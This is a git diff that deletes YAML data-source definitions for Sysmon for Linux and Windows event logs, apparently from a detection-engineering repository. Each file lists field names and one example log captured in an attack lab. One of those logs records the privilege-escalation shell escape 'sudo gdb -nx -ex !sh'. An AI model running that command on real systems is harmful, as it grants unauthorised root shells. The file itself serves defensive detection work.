-- OriginalFileName
-- ParentCommandLine
-- ParentImage
-- ParentProcessGuid
-- ParentProcessId
-- ParentUser
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Product
-- RecordID
-- RuleName
-- SystemTime
-- System_Props_Xml
-- Task
-- TerminalSessionId
-- ThreadID
-- User
-- UserId
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- eventtype
-- host
-- index
-- linecount
-- original_file_name
-- os
-- parent_process
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process
-- process_current_directory
-- process_exec
-- process_guid
-- process_hash
-- process_id
-- process_integrity_level
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- vendor_product
-example_log: 154100x80000000000000001926574Linux-Sysmon/Operationalar-linux-2022-08-09 10:42:47.757{ec23eae3-3a27-62f2-085e-16549b550000}10268/usr/bin/sudo-----sudo gdb -nx -ex !sh -ex quit/home/ubuntuubuntu{ec23eae3-315b-62f2-e803-000000000000}100013no level-{ec23eae3-315b-62f2-4884-4ea587550000}15369/bin/bash-bashubuntu
diff --git a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml b/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
deleted file mode 100644
index 6b660ad3b8..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon for Linux EventID 11
-fields:
-- _time
-- Channel
-- Computer
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RuleName
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- User
-- UserId
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- eventtype
-- file_create_time
-- file_name
-- file_path
-- host
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user
-- vendor_product
-example_log: 11241100x8000000000000000792913Linux-Sysmon/Operationalsysmonlinux-tcontreras-attack-range-4134-2021-12-20 16:07:17.929{ec2c97d1-6aa9-61c0-3038-618238560000}5256/opt/splunkforwarder/bin/splunkd/opt/splunkforwarder/var/lib/splunk/modinputs/journald/sysmon.checkpoint.tmp.dbed9d351dcc18062021-12-20 16:07:17.929root
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
deleted file mode 100644
index 3b6313937b..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Windows Event Log Application 2282
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- ModuleDll
-- Name
-- Opcode
-- ProcessID
-- ProcessorArchitecture
-- Qualifiers
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor_product
-example_log: 228202000x800000000000001001307Applicationwin-dc-exch01.attackrange.localc:\temp\msf.dllAMD64C1000000
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
deleted file mode 100644
index 246826e7ed..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
+++ /dev/null
@@ -1,47 +0,0 @@
-event_name: Windows Event Log Application 3000
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- param3
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: 300004000x8000000000000021334Applicationwin-host-mhaag-attack-range-117C:\Windows\System32\klist.exe001d8c3afcf370d13
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
deleted file mode 100644
index d66fa4dd45..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-event_name: Windows Event Log CAPI2 70
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 70047000x4000000000000080308332Microsoft-Windows-CAPI2/Operationalwin-dc-mhaag-attack-range-84.attackrange.local
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
deleted file mode 100644
index 898b2ab481..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-event_name: Windows Event Log CAPI2 81
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 81028020x40000000000000402400597Microsoft-Windows-CAPI2/Operationalmswin-server.attackrange.local{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}WTD_UI_NONEWTD_STATEACTION_VERIFY2021-01-07T23:21:42.655ZThe digital signature of the object did not verify.The digital signature of the object did not verify.
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
deleted file mode 100644
index d54bcba5a6..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
+++ /dev/null
@@ -1,51 +0,0 @@
-event_name: Windows Event Log CertificateServicesClient 1007
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 100704000x80000000000000002Microsoft-Windows-CertificateServicesClient-Lifecycle-System/OperationalDESKTOP-92OQLA1CN=test.atomic.comtest.atomic.com2024-02-01T17:18:09Z
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
deleted file mode 100644
index 493b18802f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Windows Event Log Defender 1121
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- Detection_Time
-- Engine_Version
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ID
-- Inhertiance_Flags
-- Involved_File
-- Keywords
-- Level
-- Name
-- New_Value
-- Old_Value
-- Opcode
-- Parent_Commandline
-- Path
-- ProcessID
-- Process_Name
-- Product_Name
-- Product_Version
-- RecordNumber
-- RuleType
-- Security_intelligence_Version
-- SystemTime
-- System_Props_Xml
-- Target_Commandline
-- Task
-- ThreadID
-- User
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: 112103000x80000000000000002975Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:29:48.984Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
deleted file mode 100644
index f7448276f1..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
+++ /dev/null
@@ -1,55 +0,0 @@
-event_name: Windows Event Log Defender 1122
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- Detection_Time
-- Engine_Version
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ID
-- Inhertiance_Flags
-- Keywords
-- Level
-- Name
-- Opcode
-- Parent_Commandline
-- Path
-- ProcessID
-- Process_Name
-- Product_Name
-- Product_Version
-- RecordNumber
-- RuleType
-- Security_intelligence_Version
-- SystemTime
-- System_Props_Xml
-- Target_Commandline
-- Task
-- ThreadID
-- User
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: 112204000x80000000000000003701Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009E6DB77E5-3DF2-4CF1-B95A-636979351E5B2023-11-26T23:43:08.709Z(unknown user)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe1.401.1247.01.1.23100.2009ENT\ConsRC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x00000000
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
deleted file mode 100644
index facedb79bd..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
+++ /dev/null
@@ -1,45 +0,0 @@
-event_name: Windows Event Log Defender 5007
-fields:
-- _time
-- Channel
-- Computer
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- New_Value
-- Old_Value
-- Opcode
-- ProcessID
-- Product_Name
-- Product_Version
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: 500704000x80000000000000003726Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
deleted file mode 100644
index c67919db56..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
+++ /dev/null
@@ -1,42 +0,0 @@
-event_name: Windows Event Log RemoteConnectionManager 1149
-fields:
-- _time
-- ActivityID
-- Channel
-- Computer
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- UserID
-- Version
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
-example_log: 114904000x10000000000000002064Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operationalar-win-1.attackrange.localAdministratorATTACKRANGE10.0.1.14
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
deleted file mode 100644
index d9d4b79003..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
+++ /dev/null
@@ -1,64 +0,0 @@
-event_name: Windows Event Log Security 1100
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- service
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 11000410300x4020000000000000140874Securityar-win-2
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
deleted file mode 100644
index 00f11c83cb..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Windows Event Log Security 1102
-fields:
-- _time
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- LogFileCleared_Xml
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserData_Xml
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-field_mappings:
- - data_model: ocsf
- mapping:
- Computer: device.hostname
- EventID: metadata.event_code
- SystemTime: metadata.original_time
-example_log: 11020410400x40200000000000001826166Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x34a3a27
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
deleted file mode 100644
index 36ac809122..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
+++ /dev/null
@@ -1,107 +0,0 @@
-event_name: Windows Event Log Security 4624
-fields:
-- _time
-- ActivityID
-- AuthenticationPackageName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- ElevatedToken
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- ImpersonationLevel
-- IpAddress
-- IpPort
-- KeyLength
-- Keywords
-- Level
-- LmPackageName
-- LogonGuid
-- LogonProcessName
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- RestrictedAdminMode
-- Source_Port
-- Source_Workstation
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLinkedLogonId
-- TargetLogonId
-- TargetOutboundDomainName
-- TargetOutboundUserName
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TransmittedServices
-- Version
-- VirtualAccount
-- WorkstationName
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_ip
-- src_port
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4624201254400x8020000000000000371886Securityar-win-7.attackrange.localNULL SID--0x0ATTACKRANGE\ELMER_SALASELMER_SALASATTACKRANGE.LOCAL0x693ef43KerberosKerberos-{139F7D70-0163-38CC-676D-00AE04A0F19C}--00x0-10.0.1.1649980%%1833---%%18430x0%%1843
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
deleted file mode 100644
index d44f1d469a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
+++ /dev/null
@@ -1,126 +0,0 @@
-event_name: Windows Event Log Security 4625
-fields:
-- _time
-- ActivityID
-- AuthenticationPackageName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- FailureReason
-- Guid
-- IpAddress
-- IpPort
-- KeyLength
-- Keywords
-- Level
-- LmPackageName
-- LogonProcessName
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- Source_Port
-- Source_Workstation
-- Status
-- SubStatus
-- Sub_Status
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TransmittedServices
-- Version
-- WorkstationName
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_ip
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-field_mappings:
- - data_model: ocsf
- mapping:
- ProcessName: actor.process.file
- LogonProcessName: logon_process.name
- ProcessId: actor.process.pid
- AuthenticationPackageName: auth_protocol
- IpAddress: src_endpoint.ip
- IpPort: src_endpoint.port
- LogonType: logon_type_id
- TargetDomainName: user.domain
- TargetUserName: user.name
- TargetUserSid: user.uid
- SubjectDomainName: actor.user.domain
- SubjectUserName: actor.user.name
- SubjectLogonId: actor.session.uid
- SubjectUserSid: actor.user.uid
- WorkstationName: src_endpoint.name
- EventID: metadata.event_code
- Name: metadata.log_provider
- EventRecordID: metadata.sequence
- Computer: device.hostname
- SystemTime: metadata.original_time
-example_log: 4625001254400x8010000000000000367348Securityar-win-8.attackrange.localNULL SID--0x0NULL SIDAdministratorbuiltin0xc000006d%%23130xc000006a3NtLmSsp NTLM---00x0-10.0.1.3059450
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
deleted file mode 100644
index 6263d9b7c3..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: Windows Event Log Security 4627
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventCountTotal
-- EventData_Xml
-- EventID
-- EventIdx
-- EventRecordID
-- GroupMembership
-- Guid
-- Keywords
-- Level
-- LogonType
-- Logon_ID
-- Logon_Type
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLogonId
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4627001255400x8020000000000000186260Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094dbc311
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
deleted file mode 100644
index fb46151c29..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: Windows Event Log Security 4648
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- LogonGuid
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- RecordNumber
-- Source_Port
-- Source_Workstation
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetInfo
-- TargetLogonGuid
-- TargetServerName
-- TargetUserName
-- Target_Domain
-- Target_Server_Name
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dest_nt_host
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- process_id
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_domain
-- src_nt_host
-- src_port
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::app
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4648001254400x8020000000000000336567Securitywin-host-mvelazco-02713-447.attackrange.localATTACKRANGE\REED_LARSENreed_larsenATTACKRANGE0x1360f2{00000000-0000-0000-0000-000000000000}STEVE_BRADFORDattackrange.local{00000000-0000-0000-0000-000000000000}win-dc-mvelazco-02713-392.attackrange.localwin-dc-mvelazco-02713-392.attackrange.local0x410.0.1.14445
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
deleted file mode 100644
index 06143f4630..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Windows Event Log Security 4662
-fields:
-- _time
-- AccessList
-- AccessMask
-- ActivityID
-- AdditionalInfo
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HandleId
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectName
-- ObjectServer
-- ObjectType
-- Opcode
-- OperationType
-- ProcessID
-- Properties
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_file_name
-- object_file_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4662001408000x801000000000000021623198276Securityattack_range_dcattack_range\attackerattackerattack_range0x632426dc0DSgroupCN=Incoming Forest Trust Builders,CN=Users,DC=Attack_RangeObject Access0x0%%7688
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
deleted file mode 100644
index 3809602d1a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4663
-fields:
-- _time
-- AccessList
-- AccessMask
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HandleId
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectName
-- ObjectServer
-- ObjectType
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- ResourceAttributes
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- name
-- object_file_name
-- object_file_path
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4663101280000x802000000000000010525869Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x6cfe7SecurityFileC:\Program Files (x86)\ScreenConnect\App_Extensions\evilapp - Copy (2).aspx0x2220%%4424
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
deleted file mode 100644
index cbe5628706..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Windows Event Log Security 4672
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
